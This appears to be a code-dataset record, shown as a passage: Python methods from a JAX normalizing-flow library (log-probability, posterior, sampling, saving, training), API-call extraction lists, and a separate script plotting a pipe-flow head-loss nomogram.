inputs : pd.DataFrame
Input data for which log probability density is calculated.
Every column in self.data_columns must be present.
If self.conditional_columns is not None, those must be present
as well. If other columns are present, they are ignored.
err_samples : int, default=None
Number of samples from the error distribution to average over for
the log_prob calculation. If provided, Gaussian errors are assumed,
and method will look for error columns in `inputs`. Error columns
must end in `_err`. E.g. the error column for the variable `u` must
be `u_err`. Zero error assumed for any missing error columns.
seed : int, default=None
Random seed for drawing the samples with Gaussian errors.
Returns
-------
np.ndarray
Device array of shape (inputs.shape[0],).
"""
if err_samples is None:
# convert data to an array with columns ordered
columns = list(self.data_columns)
X = np.array(inputs[columns].values)
# get conditions
conditions = self._get_conditions(inputs)
# calculate log_prob
return self._log_prob(self._params, X, conditions)
else:
# validate nsamples
assert isinstance(
err_samples, int
), "err_samples must be a positive integer."
assert err_samples > 0, "err_samples must be a positive integer."
# get Gaussian samples
seed = onp.random.randint(1e18) if seed is None else seed
key = random.PRNGKey(seed)
X = self._get_err_samples(key, inputs, err_samples, type="data")
C = self._get_err_samples(key, inputs, err_samples, type="conditions")
# calculate log_probs
log_probs = self._log_prob(self._params, X, C)
probs = np.exp(log_probs.reshape(-1, err_samples))
return np.log(probs.mean(axis=1))
def posterior(
self,
inputs: pd.DataFrame,
column: str,
grid: np.ndarray,
marg_rules: dict = None,
normalize: bool = True,
err_samples: int = None,
seed: int = None,
batch_size: int = None,
nan_to_zero: bool = True,
) -> np.ndarray:
"""Calculates posterior distributions for the provided column.
Calculates the conditional posterior distribution, assuming the
data values in the other columns of the DataFrame.
Parameters
----------
inputs : pd.DataFrame
Data on which the posterior distributions are conditioned.
Must have columns matching self.data_columns, *except*
for the column specified for the posterior (see below).
column : str
Name of the column for which the posterior distribution
is calculated. Must be one of the columns in self.data_columns.
However, whether or not this column is one of the columns in
`inputs` is irrelevant.
grid : np.ndarray
Grid on which to calculate the posterior.
marg_rules : dict, optional
Dictionary with rules for marginalizing over missing variables.
The dictionary must contain the key "flag", which gives the flag
that indicates a missing value. E.g. if missing values are given
the value 99, the dictionary should contain {"flag": 99}.
The dictionary must also contain {"name": callable} for any
variables that will need to be marginalized over, where name is
the name of the variable, and callable is a callable that takes
the row of variables nad returns a grid over which to marginalize
the variable. E.g. {"y": lambda row: np.linspace(0, row["x"], 10)}.
Note: the callable for a given name must *always* return an array
of the same length, regardless of the input row.
err_samples : int, default=None
Number of samples from the error distribution to average over for
the posterior calculation. If provided, Gaussian errors are assumed,
and method will look for error columns in `inputs`. Error columns
must end in `_err`. E.g. the error column for the variable `u` must
be `u_err`. Zero error assumed for any missing error columns.
seed : int, default=None
Random seed for drawing the samples with Gaussian errors.
batch_size : int, default=None
Size of batches in which to calculate posteriors. If None, all
posteriors are calculated simultaneously. Simultaneous calculation
is faster, but memory intensive for large data sets.
normalize : boolean, default=True
Whether to normalize the posterior so that it integrates to 1.
nan_to_zero : bool, default=True
Whether to convert NaN's to zero probability in the final pdfs.
Returns
-------
np.ndarray
Device array of shape (inputs.shape[0], grid.size).
"""
# get the index of the provided column, and remove it from the list
columns = list(self.data_columns)
idx = columns.index(column)
columns.remove(column)
nrows = inputs.shape[0]
batch_size = nrows if batch_size is None else batch_size
# make sure indices run 0 -> nrows
inputs = inputs.reset_index(drop=True)
if err_samples is not None:
# validate nsamples
assert isinstance(
err_samples, int
), "err_samples must be a positive integer."
assert err_samples > 0, "err_samples must be a positive integer."
# set the seed
seed = onp.random.randint(1e18) if seed is None else seed
key = random.PRNGKey(seed)
# empty array to hold pdfs
pdfs = np.zeros((nrows, len(grid)))
# if marginalization rules were passed, we will loop over the rules
# and repeatedly call this method
if marg_rules is not None:
# if the flag is NaN, we must use np.isnan to check for flags
if onp.isnan(marg_rules["flag"]):
def check_flags(data):
return onp.isnan(data)
# else we use np.isclose to check for flags
else:
def check_flags(data):
return onp.isclose(data, marg_rules["flag"])
# first calculate pdfs for unflagged rows
unflagged_idx = inputs[
~check_flags(inputs[columns]).any(axis=1)
].index.tolist()
unflagged_pdfs = self.posterior(
inputs=inputs.iloc[unflagged_idx],
column=column,
grid=grid,
err_samples=err_samples,
seed=seed,
batch_size=batch_size,
normalize=False,
nan_to_zero=nan_to_zero,
)
# save these pdfs in the big array
pdfs = ops.index_update(
pdfs,
ops.index[unflagged_idx, :],
unflagged_pdfs,
indices_are_sorted=True,
unique_indices=True,
)
# we will keep track of all the rows we've already calculated
# posteriors for
already_done = unflagged_idx
# now we will loop over the rules in marg_rules
for name, rule in marg_rules.items():
# ignore the flag, because that's not a column in the data
if name == "flag":
continue
# get the list of new rows for which we need to calculate posteriors
flagged_idx = inputs[check_flags(inputs[name])].index.tolist()
flagged_idx = list(set(flagged_idx).difference(already_done))
# if flagged_idx is empty, move on!
if len(flagged_idx) == 0:
continue
# get the marginalization grid for each row
marg_grids = (
inputs.iloc[flagged_idx]
.apply(rule, axis=1, result_type="expand")
.values
)
# make a new data frame with the marginalization grids replacing
# the values of the flag in the column
marg_inputs = pd.DataFrame(
np.repeat(
inputs.iloc[flagged_idx].values, marg_grids.shape[1], axis=0
),
columns=inputs.columns,
)
marg_inputs[name] = marg_grids.reshape(marg_inputs.shape[0], 1)
# remove the error column if it's present
marg_inputs.drop(f"{name}_err", axis=1, inplace=True, errors="ignore")
# calculate posteriors for these
marg_pdfs = self.posterior(
inputs=marg_inputs,
column=column,
grid=grid,
marg_rules=marg_rules,
err_samples=err_samples,
seed=seed,
batch_size=batch_size,
normalize=False,
nan_to_zero=nan_to_zero,
)
# sum over the marginalized dimension
marg_pdfs = marg_pdfs.reshape(
len(flagged_idx), marg_grids.shape[1], grid.size
)
marg_pdfs = marg_pdfs.sum(axis=1)
# save the new pdfs in the big array
pdfs = ops.index_update(
pdfs,
ops.index[flagged_idx, :],
marg_pdfs,
indices_are_sorted=True,
unique_indices=True,
)
# add these flagged indices to the list of rows already done
already_done += flagged_idx
# now for the main posterior calculation loop
else:
# loop through batches
for batch_idx in range(0, nrows, batch_size):
# get the data batch
# and, if this is a conditional flow, the correpsonding conditions
batch = inputs.iloc[batch_idx : batch_idx + batch_size]
# if not drawing samples, just grab batch and conditions
if err_samples is None:
conditions = self._get_conditions(batch)
batch = np.array(batch[columns].values)
# if only drawing condition samples...
elif len(self.data_columns) == 1:
conditions = self._get_err_samples(
key, batch, err_samples, type="conditions"
)
batch = np.repeat(batch[columns].values, err_samples, axis=0)
# if drawing data and condition samples...
else:
conditions = self._get_err_samples(
key, batch, err_samples, type="conditions"
)
batch = self._get_err_samples(
key, batch, err_samples, skip=column, type="data"
)
# make a new copy of each row for each value of the column
# for which we are calculating the posterior
batch = np.hstack(
(
np.repeat(batch[:, :idx], len(grid), axis=0,),
np.tile(grid, len(batch))[:, None],
np.repeat(batch[:, idx:], len(grid), axis=0,),
)
)
# make similar copies of the conditions
conditions = np.repeat(conditions, len(grid), axis=0)
# calculate probability densities
log_prob = self._log_prob(self._params, batch, conditions).reshape(
(-1, len(grid))
)
prob = np.exp(log_prob)
# if we were Gaussian sampling, average over the samples
if err_samples is not None:
prob = prob.reshape(-1, err_samples, len(grid))
prob = prob.mean(axis=1)
# add the pdfs to the bigger list
pdfs = ops.index_update(
pdfs,
ops.index[batch_idx : batch_idx + batch_size, :],
prob,
indices_are_sorted=True,
unique_indices=True,
)
if normalize:
# normalize so they integrate to one
pdfs = pdfs / np.trapz(y=pdfs, x=grid).reshape(-1, 1)
if nan_to_zero:
# set NaN's equal to zero probability
pdfs = np.nan_to_num(pdfs, nan=0.0)
return pdfs
def sample(
self,
nsamples: int = 1,
conditions: pd.DataFrame = None,
save_conditions: bool = True,
seed: int = None,
) -> pd.DataFrame:
"""Returns samples from the normalizing flow.
Parameters
----------
nsamples : int, default=1
The number of samples to be returned.
conditions : pd.DataFrame, optional
If this is a conditional flow, you must pass conditions for
each sample. nsamples will be drawn for each row in conditions.
save_conditions : bool, default=True
If true, conditions will be saved in the DataFrame of samples
that is returned.
seed : int, optional
Sets the random seed for the samples.
Returns
-------
pd.DataFrame
Pandas DataFrame of samples.
"""
# validate nsamples
assert isinstance(nsamples, int), "nsamples must be a positive integer."
assert nsamples > 0, "nsamples must be a positive integer."
if self.conditional_columns is not None and conditions is None:
raise ValueError(
f"Must provide the following conditions\n{self.conditional_columns}"
)
# if this isn't a conditional flow, get empty conditions
if self.conditional_columns is None:
conditions = np.zeros((nsamples, 1))
# otherwise get conditions and make `nsamples` copies of each
else:
conditions = self._get_conditions(conditions)
conditions = np.repeat(conditions, nsamples, axis=0)
# draw from latent distribution
u = self.latent.sample(self._params[0], conditions.shape[0], seed)
# take the inverse back to the data distribution
x = self._inverse(self._params[1], u, conditions=conditions)[0]
# if not conditional, or save_conditions is False, this is all we need
if self.conditional_columns is None or save_conditions is False:
x = pd.DataFrame(x, columns=self.data_columns)
# but if conditional and save_conditions is True,
# save conditions with samples
else:
# unscale the conditons
conditions = conditions * self._condition_stds + self._condition_means
x = pd.DataFrame(
np.hstack((x, conditions)),
columns=self.data_columns + self.conditional_columns,
)
# return the samples!
return x
def _save_dict(self):
"""Returns the dictionary of all flow params to be saved."""
save_dict = {"class": self.__class__.__name__}
keys = [
"data_columns",
"conditional_columns",
"condition_means",
"condition_stds",
"data_error_model",
"condition_error_model",
"autoscale_conditions",
"info",
"latent_info",
"bijector_info",
"params",
]
for key in keys:
try:
save_dict[key] = getattr(self, key)
except AttributeError:
try:
save_dict[key] = getattr(self, "_" + key)
except AttributeError:
save_dict[key] = None
return save_dict
def save(self, file: str):
"""Saves the flow to a file.
Pickles the flow and saves it to a file that can be passed as
the `file` argument during flow instantiation.
WARNING: Currently, this method only works for bijectors that are
implemented in the `bijectors` module. If you want to save a flow
with a custom bijector, you either need to add the bijector to that
module, or handle the saving and loading on your end.
Parameters
----------
file : str
Path to where the flow will be saved.
Extension `.pkl` will be appended if not already present.
"""
save_dict = self._save_dict()
with open(file, "wb") as handle:
pickle.dump(save_dict, handle, recurse=True)
def train(
self,
inputs: pd.DataFrame,
epochs: int = 50,
batch_size: int = 1024,
optimizer: Optimizer = None,
loss_fn: Callable = None,
convolve_errs: bool = False,
seed: int = 0,
verbose: bool = False,
) -> list:
"""Trains the normalizing flow on the provided inputs.
Parameters
----------
inputs : pd.DataFrame
Data on which to train the normalizing flow.
Must have columns matching self.data_columns.
epochs : int, default=50
Number of epochs to train.
batch_size : int, default=1024
Batch size for training.
optimizer : jax Optimizer, default=adam(step_size=1e-3)
An optimizer from jax.experimental.optimizers.
loss_fn : Callable, optional
A function to calculate the loss: loss = loss_fn(params, x).
If not provided, will be -mean(log_prob).
convolve_errs : bool, default=False
Whether to draw new data from the error distributions during
each epoch of training. Assumes errors are Gaussian, and method
will look for error columns in `inputs`. Error columns must end
in `_err`. E.g. the error column for the variable `u` must be
`u_err`. Zero error assumed for any missing error columns.
seed : int, default=0
A random seed to control the batching and the (optional)
error sampling.
verbose : bool, default=False
If true, print the training loss every 5% of epochs.
Returns
-------
list
List of training losses from every epoch.
"""
# validate epochs
if not isinstance(epochs, int) or epochs <= 0:
raise ValueError("epochs must be a positive integer.")
# if no loss_fn is provided, use the default loss function
if loss_fn is None:
@jit
def loss_fn(params, x, c):
return -np.mean(self._log_prob(params, x, c))
# initialize the optimizer
optimizer = adam(step_size=1e-3) if optimizer is None else optimizer
opt_init, opt_update, get_params = optimizer
opt_state = opt_init(self._params)
# define the training step function
@jit
def step(i, opt_state, x, c):
params = get_params(opt_state)
gradients = grad(loss_fn)(params, x, c)
return opt_update(i, gradients, opt_state)
# get list of data columns
columns = list(self.data_columns)
# if this is a conditional flow, and autoscale_conditions == True
# save the means and stds of the conditional columns
if self.conditional_columns is not None and self._autoscale_conditions:
self._condition_means = np.array(
inputs[list(self.conditional_columns)].values.mean(axis=0)
)
condition_stds = np.array(
inputs[list(self.conditional_columns)].values.std(axis=0)
)
self._condition_stds = np.where(condition_stds != 0, condition_stds, 1)
# define a function to return batches
if convolve_errs:
def get_batch(sample_key, x, type):
return self._get_err_samples(sample_key, x, 1, type=type)
else:
def get_batch(sample_key, x, type):
if type == "conditions":
return self._get_conditions(x)
else:
return np.array(x[columns].values)
# get random seed for training loop
key = random.PRNGKey(seed)
if verbose:
print(f"Training {epochs} epochs \nLoss:")
# save the initial loss
X = np.array(inputs[columns].values)
C = self._get_conditions(inputs)
losses = [loss_fn(self._params, X, C)]
if verbose:
print(f"(0) {losses[-1]:.4f}")
# loop through training
itercount = itertools.count()
for epoch in range(epochs):
# new permutation of batches
permute_key, sample_key, key = random.split(key, num=3)
idx = random.permutation(permute_key, inputs.shape[0])
X = inputs.iloc[idx]
# loop through batches and step optimizer
for batch_idx in range(0, len(X), batch_size):
# if sampling from the error distribution, this returns a
# Gaussian sample of the batch. Else just returns batch as a
# jax array
batch = get_batch(
sample_key, X.iloc[batch_idx : batch_idx + batch_size], type="data"
)
batch_conditions = get_batch(
sample_key,
X.iloc[batch_idx : batch_idx + batch_size],
type="conditions",
)
opt_state = step(next(itercount), opt_state, batch, batch_conditions,)
# save end-of-epoch training loss
params = get_params(opt_state)
losses.append(
loss_fn(params, np.array(X[columns].values), self._get_conditions(X),)
)
if verbose and (
epoch % max(int(0.05 * epochs), 1) == 0 or (epoch + 1) == epochs
):
print(f"({epoch+1}) {losses[-1]:.4f}")
# update the flow parameters with the final training state
self._params = get_params(opt_state)
return losses
|
[
"jax.random.split",
"pzflow.utils.build_bijector_from_info",
"dill.load",
"jax.numpy.repeat",
"jax.random.PRNGKey",
"jax.numpy.hstack",
"jax.numpy.delete",
"jax.experimental.optimizers.adam",
"pandas.DataFrame",
"jax.numpy.nan_to_num",
"jax.numpy.where",
"dill.dump",
"numpy.isnan",
"jax.numpy.zeros",
"numpy.isclose",
"jax.ops.index_update",
"jax.numpy.exp",
"jax.numpy.trapz",
"jax.numpy.array",
"pzflow.distributions.Normal",
"numpy.random.randint",
"itertools.count",
"jax.grad",
"jax.random.permutation"
] |
[((12923, 12959), 'jax.numpy.nan_to_num', 'np.nan_to_num', (['log_prob'], {'nan': 'np.NINF'}), '(log_prob, nan=np.NINF)\n', (12936, 12959), True, 'import jax.numpy as np\n'), ((34142, 34162), 'jax.random.PRNGKey', 'random.PRNGKey', (['seed'], {}), '(seed)\n', (34156, 34162), False, 'from jax import grad, jit, ops, random\n'), ((34284, 34316), 'jax.numpy.array', 'np.array', (['inputs[columns].values'], {}), '(inputs[columns].values)\n', (34292, 34316), True, 'import jax.numpy as np\n'), ((34521, 34538), 'itertools.count', 'itertools.count', ([], {}), '()\n', (34536, 34538), False, 'import itertools\n'), ((7535, 7580), 'pzflow.utils.build_bijector_from_info', 'build_bijector_from_info', (['self._bijector_info'], {}), '(self._bijector_info)\n', (7559, 7580), False, 'from pzflow.utils import build_bijector_from_info, gaussian_error_model\n'), ((10195, 10225), 'jax.numpy.zeros', 'np.zeros', (['(inputs.shape[0], 1)'], {}), '((inputs.shape[0], 1))\n', (10203, 10225), True, 'import jax.numpy as np\n'), ((10390, 10422), 'jax.numpy.array', 'np.array', (['inputs[columns].values'], {}), '(inputs[columns].values)\n', (10398, 10422), True, 'import jax.numpy as np\n'), ((11918, 11945), 'jax.numpy.array', 'np.array', (['X[columns].values'], {}), '(X[columns].values)\n', (11926, 11945), True, 'import jax.numpy as np\n'), ((11947, 11978), 'jax.numpy.array', 'np.array', (['X[err_columns].values'], {}), '(X[err_columns].values)\n', (11955, 11978), True, 'import jax.numpy as np\n'), ((12280, 12312), 'jax.numpy.delete', 'np.delete', (['Xsamples', 'idx'], {'axis': '(1)'}), '(Xsamples, idx, axis=1)\n', (12289, 12312), True, 'import jax.numpy as np\n'), ((14313, 14345), 'jax.numpy.array', 'np.array', (['inputs[columns].values'], {}), '(inputs[columns].values)\n', (14321, 14345), True, 'import jax.numpy as np\n'), ((14894, 14914), 'jax.random.PRNGKey', 'random.PRNGKey', (['seed'], {}), '(seed)\n', (14908, 14914), False, 'from jax import grad, jit, ops, random\n'), ((19200, 19220), 'jax.random.PRNGKey', 'random.PRNGKey', (['seed'], {}), '(seed)\n', (19214, 19220), False, 'from jax import grad, jit, ops, random\n'), ((19545, 19574), 'numpy.isnan', 'onp.isnan', (["marg_rules['flag']"], {}), "(marg_rules['flag'])\n", (19554, 19574), True, 'import numpy as onp\n'), ((20433, 20550), 'jax.ops.index_update', 'ops.index_update', (['pdfs', 'ops.index[unflagged_idx, :]', 'unflagged_pdfs'], {'indices_are_sorted': '(True)', 'unique_indices': '(True)'}), '(pdfs, ops.index[unflagged_idx, :], unflagged_pdfs,\n indices_are_sorted=True, unique_indices=True)\n', (20449, 20550), False, 'from jax import grad, jit, ops, random\n'), ((26251, 26279), 'jax.numpy.nan_to_num', 'np.nan_to_num', (['pdfs'], {'nan': '(0.0)'}), '(pdfs, nan=0.0)\n', (26264, 26279), True, 'import jax.numpy as np\n'), ((27706, 27729), 'jax.numpy.zeros', 'np.zeros', (['(nsamples, 1)'], {}), '((nsamples, 1))\n', (27714, 27729), True, 'import jax.numpy as np\n'), ((27897, 27936), 'jax.numpy.repeat', 'np.repeat', (['conditions', 'nsamples'], {'axis': '(0)'}), '(conditions, nsamples, axis=0)\n', (27906, 27936), True, 'import jax.numpy as np\n'), ((28350, 28392), 'pandas.DataFrame', 'pd.DataFrame', (['x'], {'columns': 'self.data_columns'}), '(x, columns=self.data_columns)\n', (28362, 28392), True, 'import pandas as pd\n'), ((30417, 30461), 'dill.dump', 'pickle.dump', (['save_dict', 'handle'], {'recurse': '(True)'}), '(save_dict, handle, recurse=True)\n', (30428, 30461), True, 'import dill as pickle\n'), ((32615, 32636), 'jax.experimental.optimizers.adam', 'adam', ([], {'step_size': '(0.001)'}), '(step_size=0.001)\n', (32619, 32636), False, 'from jax.experimental.optimizers import Optimizer, adam\n'), ((33605, 33653), 'jax.numpy.where', 'np.where', (['(condition_stds != 0)', 'condition_stds', '(1)'], {}), '(condition_stds != 0, condition_stds, 1)\n', (33613, 33653), True, 'import jax.numpy as np\n'), ((34659, 34683), 'jax.random.split', 'random.split', (['key'], {'num': '(3)'}), '(key, num=3)\n', (34671, 34683), False, 'from jax import grad, jit, ops, random\n'), ((34702, 34750), 'jax.random.permutation', 'random.permutation', (['permute_key', 'inputs.shape[0]'], {}), '(permute_key, inputs.shape[0])\n', (34720, 34750), False, 'from jax import grad, jit, ops, random\n'), ((7653, 7670), 'jax.random.PRNGKey', 'random.PRNGKey', (['(0)'], {}), '(0)\n', (7667, 7670), False, 'from jax import grad, jit, ops, random\n'), ((9059, 9096), 'pzflow.distributions.Normal', 'distributions.Normal', (['self._input_dim'], {}), '(self._input_dim)\n', (9079, 9096), False, 'from pzflow import distributions\n'), ((9807, 9827), 'jax.random.PRNGKey', 'random.PRNGKey', (['seed'], {}), '(seed)\n', (9821, 9827), False, 'from jax import grad, jit, ops, random\n'), ((11577, 11597), 'jax.numpy.zeros', 'np.zeros', (['X.shape[0]'], {}), '(X.shape[0])\n', (11585, 11597), True, 'import jax.numpy as np\n'), ((14825, 14850), 'numpy.random.randint', 'onp.random.randint', (['(1e+18)'], {}), '(1e+18)\n', (14843, 14850), True, 'import numpy as onp\n'), ((19131, 19156), 'numpy.random.randint', 'onp.random.randint', (['(1e+18)'], {}), '(1e+18)\n', (19149, 19156), True, 'import numpy as onp\n'), ((23037, 23147), 'jax.ops.index_update', 'ops.index_update', (['pdfs', 'ops.index[flagged_idx, :]', 'marg_pdfs'], {'indices_are_sorted': '(True)', 'unique_indices': '(True)'}), '(pdfs, ops.index[flagged_idx, :], marg_pdfs,\n indices_are_sorted=True, unique_indices=True)\n', (23053, 23147), False, 'from jax import grad, jit, ops, random\n'), ((25456, 25472), 'jax.numpy.exp', 'np.exp', (['log_prob'], {}), '(log_prob)\n', (25462, 25472), True, 'import jax.numpy as np\n'), ((25776, 25902), 'jax.ops.index_update', 'ops.index_update', (['pdfs', 'ops.index[batch_idx:batch_idx + batch_size, :]', 'prob'], {'indices_are_sorted': '(True)', 'unique_indices': '(True)'}), '(pdfs, ops.index[batch_idx:batch_idx + batch_size, :], prob,\n indices_are_sorted=True, unique_indices=True)\n', (25792, 25902), False, 'from jax import grad, jit, ops, random\n'), ((28669, 28695), 'jax.numpy.hstack', 'np.hstack', (['(x, conditions)'], {}), '((x, conditions))\n', (28678, 28695), True, 'import jax.numpy as np\n'), ((32931, 32944), 'jax.grad', 'grad', (['loss_fn'], {}), '(loss_fn)\n', (32935, 32944), False, 'from jax import grad, jit, ops, random\n'), ((11063, 11102), 'jax.numpy.zeros', 'np.zeros', (['(err_samples * X.shape[0], 1)'], {}), '((err_samples * X.shape[0], 1))\n', (11071, 11102), True, 'import jax.numpy as np\n'), ((19643, 19658), 'numpy.isnan', 'onp.isnan', (['data'], {}), '(data)\n', (19652, 19658), True, 'import numpy as onp\n'), ((19801, 19838), 'numpy.isclose', 'onp.isclose', (['data', "marg_rules['flag']"], {}), "(data, marg_rules['flag'])\n", (19812, 19838), True, 'import numpy as onp\n'), ((21852, 21923), 'jax.numpy.repeat', 'np.repeat', (['inputs.iloc[flagged_idx].values', 'marg_grids.shape[1]'], {'axis': '(0)'}), '(inputs.iloc[flagged_idx].values, marg_grids.shape[1], axis=0)\n', (21861, 21923), True, 'import jax.numpy as np\n'), ((23944, 23975), 'jax.numpy.array', 'np.array', (['batch[columns].values'], {}), '(batch[columns].values)\n', (23952, 23975), True, 'import jax.numpy as np\n'), ((34055, 34082), 'jax.numpy.array', 'np.array', (['x[columns].values'], {}), '(x[columns].values)\n', (34063, 34082), True, 'import jax.numpy as np\n'), ((35655, 35682), 'jax.numpy.array', 'np.array', (['X[columns].values'], {}), '(X[columns].values)\n', (35663, 35682), True, 'import jax.numpy as np\n'), ((6417, 6436), 'dill.load', 'pickle.load', (['handle'], {}), '(handle)\n', (6428, 6436), True, 'import dill as pickle\n'), ((11722, 11742), 'jax.numpy.zeros', 'np.zeros', (['X.shape[0]'], {}), '(X.shape[0])\n', (11730, 11742), True, 'import jax.numpy as np\n'), ((11786, 11806), 'jax.numpy.zeros', 'np.zeros', (['X.shape[0]'], {}), '(X.shape[0])\n', (11794, 11806), True, 'import jax.numpy as np\n'), ((24254, 24307), 'jax.numpy.repeat', 'np.repeat', (['batch[columns].values', 'err_samples'], {'axis': '(0)'}), '(batch[columns].values, err_samples, axis=0)\n', (24263, 24307), True, 'import jax.numpy as np\n'), ((26118, 26142), 'jax.numpy.trapz', 'np.trapz', ([], {'y': 'pdfs', 'x': 'grid'}), '(y=pdfs, x=grid)\n', (26126, 26142), True, 'import jax.numpy as np\n')]
|
from math import pi
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy.optimize import minimize_scalar
__author__ = "<NAME>"
__credits__ = ["<NAME>"]
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__version__ = "0.1"
__license__ = "MIT"
# gravitational acceleration
g = 9.81 # m/s²
# kinematic viscosity
ny = 1.3e-6 # m^2/s (10°C water)
# _________________________________________________________________________________________________________________
def log_scale(start, end, minor=False, lower=None, upper=None):
"""
get the log scale ticks for the diagram
Args:
start (int):
end (int):
minor (bool):
lower (int | float):
upper (int | float):
Returns:
numpy.array: ticks of the scale
"""
if minor:
std = np.array([1., 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.,
2.2, 2.4, 2.6, 2.8, 3., 3.2, 3.4, 3.6, 3.8, 4., 4.2,
4.4, 4.6, 4.8, 5., 5.5, 6., 6.5, 7., 7.5, 8., 8.5,
9., 9.5, 10.])
else:
std = np.array([1., 1.5, 2., 3., 4., 5., 6., 8., 10.])
res = np.array([])
for x in range(start, end):
res = np.append(res, std * 10. ** x)
res = np.unique(res.round(3))
if lower is not None:
res = res[res >= lower]
if upper is not None:
res = res[res <= upper]
return res
def nomogram(k=0.1):
"""
make the nomogram
Args:
k (float): roughness in (mm)
Returns:
matplotlib.pyplot.Figure: of the plot
"""
# diameter
d = np.array(
[0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.1, 0.125, 0.15, 0.2, 0.25, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0,
1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0]) # m
# velocity
v = np.array(
[0.1, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.2, 1.4, 1.6, 1.8, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0,
6.0, 7.0, 8.0, 9.0, 10.0, 12.0, 14.0, 16.0, 18.0, 20.0]) # m/s
# head loss
J = log_scale(-1, 3, minor=True) # mm/m
J_labels = log_scale(-1, 3, minor=False)
# flow
Q = log_scale(-1, 5, minor=True, upper=20000) # L/s
Q_labels = log_scale(-1, 5, minor=False, upper=20000)
# _________________________________________________________________________________________________________________
def area(d):
return d ** 2 * pi / 4
# _________________________________________________________________________________________________________________
def velocity(J, d):
return -2 * np.log10(2.51 * ny / (d * np.sqrt(2 * g * (J / 1000) * d)) +
(k / 1000) / (3.71 * d)) * \
np.sqrt(2 * g * d * (J / 1000))
# _________________________________________________________________________________________________________________
def get_diameter(v, J):
res = minimize_scalar(lambda x: abs(velocity(J, x) - v), bounds=(min(d), max(d)), method='bounded').x
if (round(res, 5) >= max(d)) or (round(res, 5) <= min(d)):
return np.NaN
return res
# _________________________________________________________________________________________________________________
fig, ax = plt.subplots()
def bbox(pad):
return {'facecolor': 'white', 'alpha': 0.8, 'pad': pad, 'linewidth': 0}
# _________________________________________________________________________________________________________________
# diameter lines
df_d = pd.DataFrame(index=J, columns=d)
first = True
for d_ in df_d:
vi = velocity(df_d.index.values, d_)
df_d[d_] = area(d_) * vi * 1000
# change_d = 0.6
# low, up = [0.34, 5.4]
change_d = np.NaN
low, up = [2.2, 2.2]
if d_ == change_d:
tvs = [low, up]
elif d_ < change_d:
tvs = [low]
else:
tvs = [up]
for tv in tvs:
tx = np.interp(tv, vi, J)
ty = area(d_) * tv * 1000
if first or d_ in (change_d, max(d)):
txt = 'd={}m'.format(d_)
if first:
first = False
else:
txt = d_
ax.text(tx, ty, txt, fontsize=5, rotation=30, horizontalalignment='center', verticalalignment='bottom',
bbox=bbox(1))
ax = df_d.plot(c='black', legend=False, logy=True, logx=True, ax=ax, lw=0.5)
# _________________________________________________________________________________________________________________
# velocity lines
print('0')
df_v = pd.DataFrame(index=np.logspace(-1, 3, num=500), columns=v)
# df_v = pd.DataFrame(index=J, columns=v)
first = True
for v_ in df_v:
d_ = df_v.index.to_series().apply(lambda Ji: get_diameter(v_, Ji)).values
# d_ = np.array([get_d(v_, Ji) for Ji in df_v.index.values])
Ai = area(d_)
df_v[v_] = Ai * v_ * 1000
# change_v = 5.
# low, up = [0.043, 0.43]
change_v = 9.
low, up = [0.11, 0.43]
if v_ == change_v:
tds = [low, up]
elif v_ < change_v:
tds = [low]
else:
tds = [up]
for td in tds:
data = pd.DataFrame()
data['d'] = d_
data['J'] = df_v.index.values
data.dropna(inplace=True)
data.sort_values('d', inplace=True)
tx = np.interp(td, data['d'].values, data['J'].values)
ty = area(td) * v_ * 1000
if first or (v_ in (change_v, max(v))):
txt = 'v={}m/s'.format(v_).replace('.0', '')
if first:
first = False
else:
txt = v_
if pd.notna(tx) and pd.notna(ty):
ax.text(tx, ty, txt, fontsize=5, rotation=-60, horizontalalignment='center', verticalalignment='bottom',
bbox=bbox(1))
print('1')
ax = df_v.plot(c='black', legend=False, logy=True, logx=True, ax=ax, lw=0.5)
# _________________________________________________________________________________________________________________
ax.set_xticks(J, minor=True)
ax.set_yticks(Q, minor=True)
ax.set_xticks(J_labels, minor=False)
ax.set_yticks(Q_labels, minor=False)
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_xticklabels([], minor=True)
ax.set_yticklabels([], minor=True)
ax.set_xticklabels([str(x).replace('.00', '').replace('.0', '') for x in J_labels], fontsize=6,
fontstretch='ultra-condensed')
ax.set_yticklabels([str(x).replace('.00', '').replace('.0', '') for x in Q_labels], fontsize=6)
ax.grid(linestyle=':', lw=0.2, c='grey', which='minor')
ax.grid(linestyle='-', lw=0.4, c='darkgrey')
ax.set_xlabel('Druckhöhengefälle J (mm/m)')
ax.set_ylabel('Durchfluss Q (l/s)')
ax.set_ylim([min(Q), max(Q)])
ax.set_xlim([min(J), max(J)])
ax.tick_params(direction='out', bottom=True, top=True, left=True, right=True, labelbottom=True, labeltop=True,
labelleft=True, labelright=True, which='both')
ax.text(0.15, 11000, 'k = {:0.01f} mm'.format(k), fontsize=22, fontstretch='ultra-condensed', bbox=bbox(5))
ax.text(340, 1.7, 'v (m/s)', fontsize=12, rotation=-60, bbox=bbox(2))
ax.text(300, 0.6, 'd (m)', fontsize=12, rotation=30, bbox=bbox(2))
# _________________________________________________________________________________________________________________
# figure post processing
fig.set_size_inches(h=29.7 / 2.54, w=21 / 2.54)
fig.tight_layout()
return fig
if __name__ == '__main__':
fig = nomogram()
k = 0.1 # mm
fig.savefig('Nomogramm k_{:0.1f}mm'.format(k).replace('.', '') + '.pdf')
plt.close(fig)
|
[
"numpy.sqrt",
"numpy.append",
"numpy.array",
"matplotlib.pyplot.close",
"numpy.interp",
"pandas.DataFrame",
"numpy.logspace",
"matplotlib.pyplot.subplots",
"pandas.notna"
] |
